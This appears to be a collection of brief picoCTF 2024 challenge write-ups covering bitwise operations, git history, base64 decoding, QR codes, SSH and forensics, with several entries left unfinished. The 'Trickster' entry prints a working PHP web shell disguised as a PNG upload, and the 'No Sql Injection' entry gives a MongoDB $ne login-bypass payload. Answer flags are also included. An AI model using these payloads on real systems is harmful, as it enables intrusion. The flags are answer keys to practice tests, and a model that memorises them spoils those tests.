PicoCTF 2024 on NullByte Notes

# binary search

Fri, 05 Jun 2026 00:00:00 +0000

Description:

Want to play a game? As you use more of the shell, you might be interested in how they work!

Binary search is a classic algorithm used to quickly find an item in a sorted list. Can you find the flag? You’ll have 1000 possibilities and only 10 guesses.

Cyber security often has a huge amount of data to look through - from logs, vulnerability reports, and forensics. Practicing the fundamentals manually might help you in the future when you have to write your own tools!

# binhexa

Fri, 05 Jun 2026 00:00:00 +0000

description

How well can you perfom basic binary operations?

┌──(root㉿Harsh)-[/home/jhagan/h/drop-in]
└─# nc titan.picoctf.net 57549

Welcome to the Binary Challenge!"
Your task is to perform the unique operations in the given order and find the final result in hexadecimal that yields the flag.

Binary Number 1: 00011110
Binary Number 2: 00110010


Question 1/6:
Operation 1: '>>'
Perform a right shift of Binary Number 2 by 1 bits .
Enter the binary result: 00011001
Correct!

Question 2/6:
Operation 2: '&'
Perform the operation on Binary Number 1&2.
Enter the binary result: 00010010
Correct!

Question 3/6:
Operation 3: '+'
Perform the operation on Binary Number 1&2.
Enter the binary result: 01010000
Correct!

Question 4/6:
Operation 4: '*'
Perform the operation on Binary Number 1&2.
Enter the binary result: 10111011100
Correct!

Question 5/6:
Operation 5: '<<'
Perform a left shift of Binary Number 1 by 1 bits.
Enter the binary result: 00111100
Correct!

Question 6/6:
Operation 6: '|'
Perform the operation on Binary Number 1&2.
Enter the binary result: 00111110
Correct!

Enter the results of the last operation in hexadecimal: 0x3E

Correct answer!
The flag is: picoCTF{b1tw^3se_0p3eR@tI0n_su33essFuL_1367e2c6}

# bookmarket

Fri, 05 Jun 2026 00:00:00 +0000

Description

Why search for the flag when I can make a bookmarklet to print it for me? Browse here, and find the flag!

🔍 What’s a bookmarklet?

A bookmarklet is like a small program you save as a bookmark in your browser.
Instead of going to a normal website when you click it, it runs JavaScript code.

solution

copy the java script code and run the code in the java script compiler. this will give you the flag
make a bookmark and edit the url and paste the Javascriptcode and save it . run the bookmark this give you flag

✅ Conclusion:

The challenge teaches that sometimes the solution is just running the code you’re given instead of overthinking or searching the whole site. The flag is revealed when the bookmarklet runs.

# Collaborative Development

Fri, 05 Jun 2026 00:00:00 +0000

#Description My team has been working very hard on new features for our flag printing program! I wonder how they’ll work together? You can download the challenge files here: challenge.zip

solution

wget https://artifacts.picoctf.net/c_titan/177/challenge.zip
unzip challenge.zip
cd drop-in/
git branch -a

this will show all branch

git checkout   feature/part-1
cat flag.py

┌──(root㉿Harsh)-[/home/jhagan/drop-in/drop-in]
└─# cat flag.py
print(“Printing the flag…”)
print(“picoCTF{t3@mw0rk_”, end=’')

git checkout   feature/part-2
cat flag

┌──(root㉿Harsh)-[/home/jhagan/drop-in/drop-in]
└─# cat flag.py
print(“Printing the flag…”)

print(“m@k3s_th3_dr3@m_”, end=’')

# Commitment Issues

Fri, 05 Jun 2026 00:00:00 +0000

ls -la This shows .git exists → proof it’s a Git repo.

Check commit history

┌──(root㉿Harsh)-[/home/jhagan/drop-in]
└─# git log
commit 8dc51806c760dfdbb34b33a2008926d3d8e8ad49 (HEAD -> master)
Author: picoCTF <ops@picoctf.com>
Date:   Tue Mar 12 00:06:17 2024 +0000

    remove sensitive info

commit 87b85d7dfb839b077678611280fa023d76e017b8
Author: picoCTF <ops@picoctf.com>
Date:   Tue Mar 12 00:06:17 2024 +0000

    create flag

This shows a list of commits. You notice one commit message says “create flag” — that’s when the flag was added.

# introtoburp

Fri, 05 Jun 2026 00:00:00 +0000

Description

Try here to find the flag

Solution

Open BurpSuite and the proxy web browser with the link provided in the challenge description: http://titan.picoctf.net:49297/

For the first page, it doesn’t matter the data you put in. You could put all values to anything and then click “Register”. Now on the OTP page turn the “Intercept” function to on in BurpSuite.

Doesn’t matter what is put for OTP. In the intercept now remove the text on line “otp=” but don’t remove any spaces/lines just the text from the otp.

# neterencdec

Fri, 05 Jun 2026 00:00:00 +0000

Description

Can you get the real meaning from this file. Download the file here.

solution

Base64-decoding

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Cryptography/interencdec]
└─$ cat enc_flag               
YidkM0JxZGtwQlRYdHFhR3g2YUhsZmF6TnFlVGwzWVROclh6ZzJhMnd6TW1zeWZRPT0nCg==
The padding characters (=) at the end reveals that this is likely base64-encoded data.

Let’s decode it with base64:

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Cryptography/interencdec]
└─$ cat enc_flag | base64 -d

b’d3BqdkpBTXtqaGx6aHlfazNqeTl3YTNrXzg2a2wzMmsyfQ=='

Still base64-endoded but in python byte-format.
Another round of decoding:

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Cryptography/interencdec]
└─$ echo "d3BqdkpBTXtqaGx6aHlfazNqeTl3YTNrXzg2a2wzMmsyfQ==" | base64 -d

wpjvJAM{jhlzhy_k3jy9wa3k_86kl32k2}

Now this looks like a rotation cipher like Caesar or ROT13. The caesar cipher rotates 3 positions whereas ROT13 rotates 13 positions.

# No Sql Injection

Fri, 05 Jun 2026 00:00:00 +0000

wget https://artifacts.picoctf.net/c_atlas/37/app.tar.gz
tar -xvzf app.tar.gz

open the burpsuit and login with any credentioal and interupt the network and send to repeater and edit this by :

"email":"{\"$ne\": \"null\"}",
"password":"{\"$ne\": \"null\"}"

{“success”:true,“email”:“picoplayer355@picoctf.org”,“token”:“cGljb0NURntqQmhEMnk3WG9OelB2XzFZeFM5RXc1cUwwdUk2cGFzcWxfaW5qZWN0aW9uXzY3YjFhM2M4fQ==”,“firstName”:“pico”,“lastName”:“player”}

“token”:“cGljb0NURntqQmhEMnk3WG9OelB2XzFZeFM5RXc1cUwwdUk2cGFzcWxfaW5qZWN0aW9uXzY3YjFhM2M4fQ==”

picoCTF{jBhD2y7XoNzPv_1YxS9Ew5qL0uI6pasql_injection_67b1a3c8}

nonsql injection trick

User:{"$ne":“null”} Password: {"$ne":“null”}

# Scan Surprise

Fri, 05 Jun 2026 00:00:00 +0000

I’ve gotten bored of handing out flags as text. Wouldn’t it be cool if they were an image instead?

solution

1. ssh -p 64695 ctf-player@atlas.picoctf.net
2. ls

you find the QR code in this

3. zbarimg flag.png

zbar-tools is a Linux package that lets you scan and read barcodes or QR codes directly from the command line.

It includes tools like:

✅ zbarimg → scans QR codes/barcodes from images (PNG, JPG, etc.)

✅ zbarcam → scans QR codes/barcodes live from a webcam

# Secret of the Polyglot

Fri, 05 Jun 2026 00:00:00 +0000

The Network Operations Center (NOC) of your local institution picked up a suspicious file, they’re getting conflicting information on what type of file it is. They’ve brought you in as an external expert to examine the file. Can you extract all the information from this strange file?

Solution

1.  wget https://artifacts.picoctf.net/c_titan/9/flag2of2-final.pdf
2. ls
3. convert flag2of2-final.pdf flag2of2-final.png
4. open flag2of2-final.png

picoCTF{f1u3n7_

5. apt install poppler-utils
6.  pdftotext flag2of2-final.pdf
7. cat flag2of2-final.txt

1n_pn9_&_pdf_7f9bccd1}

# Super SSH.md

Fri, 05 Jun 2026 00:00:00 +0000

Description

Using a Secure Shell (SSH) is going to be pretty important. Can you ssh as ctf-player to titan.picoctf.net at port 52017 to get the flag? You’ll also need the password 6dd28e9b. If asked, accept the fingerprint with yes.

solution

 ssh -p 52017 ctf-player@titan.picoctf.net

ssh → Secure Shell, used to remotely log into another computer/server.
-p 52017 → Specifies a non-default port (52017 instead of the usual 22).
ctf-player@titan.picoctf.net → Says:
username: ctf-player
server: titan.picoctf.net

after enter psd

# time machine

Fri, 05 Jun 2026 00:00:00 +0000

Description

What was I last working on? I remember writing a note to help me remember… You can download the challenge files here: challenge.zip

solution

wget https://artifacts.picoctf.net/c_titan/68/challenge.zip
unzip challenge.zip
cd drop-in/
cat message.txt

finally

┌──(root㉿Harsh)-[/home/jhagan/h/drop-in]
└─# git log
commit 705ff639b7846418603a3272ab54536e01e3dc43 (HEAD -> master)
Author: picoCTF <ops@picoctf.com>
Date:   Sat Mar 9 21:10:36 2024 +0000

    picoCTF{t1m3m@ch1n3_b476ca06}

conclusion

1. Git keeps history — even if the file is changed or deleted

Git records every commit (change) with:
A unique commit hash
An author and timestamp
A commit message

Even if the file with the sensitive information is later removed or modified, the data can still be recovered by checking older commits.

# Trickster

Fri, 05 Jun 2026 00:00:00 +0000

Description

I found a web app that can help process images: PNG

solution

create a file with name (untitle.png.php)
edit this file

PNG
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd'] . ' 2>&1');
    }
?>
</pre>
</body>
</html>

upload this png file and type http://atlas.picoctf.net:58157/uploads/untitled.png.php
RUN

ls -al
ls -al /var/www/html
cat /var/www/html/GAZWIMLEGU2DQ.txt

# unminify

Fri, 05 Jun 2026 00:00:00 +0000

I don’t like scrolling down to read the code of my website, so I’ve squished it. As a bonus, my pages load faster!

solution

curl http://titan.picoctf.net:50120/

seeing the clear CTF in output
flag : class=“picoCTF{pr3tty_c0d3_dbe259ce}”

# webdecode

Fri, 05 Jun 2026 00:00:00 +0000

WebDecode

Do you know how to use the web inspector? Start searching here to find the flag

Solution

inspect the about page and there is a source code right above that header is a section with this attribute notify_true=“cGljb0NURnt3ZWJfc3VjYzNzc2Z1bGx5X2QzYzBkZWRfMDJjZGNiNTl9”.
from64 decord this and find the flag .

USE : https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false,'')

Flag: picoCTF{web_succ3ssfully_d3c0ded_02c…}

Blame Game.md

Fri, 05 Jun 2026 00:00:00 +0000

Description:

Someone’s commits seems to be preventing the program from working. Who is it?

You can download the challenge files here: challenge.zip

Hints:

In collaborative projects, many users can make many changes. How can you see the changes within one file?
Read the chapter on Git from the picoPrimer here
You can use python3 .py to try running the code, though you won’t need to for this challenge. Challenge link: https://play.picoctf.org/practice/challenge/405

Solution

Analyse the git repo We start by unpacking the zip-file

canYouSeeMe

Fri, 05 Jun 2026 00:00:00 +0000

CanYouSeeMe

Challenge Description

How about some hide and seek?

This challenge focuses on metadata analysis. The flag is hidden within the metadata of an image file.

Download Challenge

wget https://artifacts.picoctf.net/c_titan/6/unknown.zip

Extract the archive:

unzip unknown.zip

This gives us:

ukn_reality.jpg

Initial Analysis

A good first step in forensic challenges is checking file metadata.

Run:

exiftool ukn_reality.jpg

What is ExifTool?

ExifTool is a powerful command-line utility used to read, write, and edit metadata from files such as:

dearDiary

Fri, 05 Jun 2026 00:00:00 +0000

Description

If you can find the flag on this disk image, we can close the case for good! Download the disk image here.

🧠 Step-by-Step Breakdown:

📥 1. Download and Extract the Disk Image

wget https://artifacts.picoctf.net/c_titan/63/disk.flag.img.gz
gunzip disk.flag.img.gz

🕵️ 2. Open with Autopsy (Forensic Tool)

Autopsy is a digital forensics platform that lets you:
Mount and explore disk images
Recover deleted files
View metadata, file content, etc.

📂 3. Explore the Root Directory

Once loaded into Autopsy, the disk image showed 3 files in the root directory:

endianness-v2

Fri, 05 Jun 2026 00:00:00 +0000

Description

Here’s a file that was recovered from a 32-bits system that organized the bytes a weird way. We’re not even sure what type of file it is. Download it here and see what you can get out of it

Solution

By using CyberChef the file was put into the input section. Then converted to hex for the “Swap Endianness” function under a word length of 4. After this, the hex looks more like a JPG with the correct ÿØÿà␀␐JFIF␀␁ magic bytes start. After the endianness was swapped and save the file . and it automatically saved with the exension of jpg . open this image and you finally get the flag .

mob Psycho

Fri, 05 Jun 2026 00:00:00 +0000

Description

Can you handle APKs? Download the android apk here.

Solution

wget  https://artifacts.picoctf.net/c_titan/142/mobpsycho.apk
unzip mobpsycho.apk
grep -iR picoCTF *
strings mobpsycho.apk | grep flag

output

res/color/flag.txtUT

🔍 Breakdown: grep -iR picoCTF *

grep — Command-line tool to search for text patterns in files.

-i — Makes the search case-insensitive (picoctf, PicoCTF, PICOCTF, etc.).

-R — Recursively searches all directories and subdirectories starting from the current one.

picoCTF — The string you’re searching for (often the format of a flag in Capture The Flag (CTF) challenges).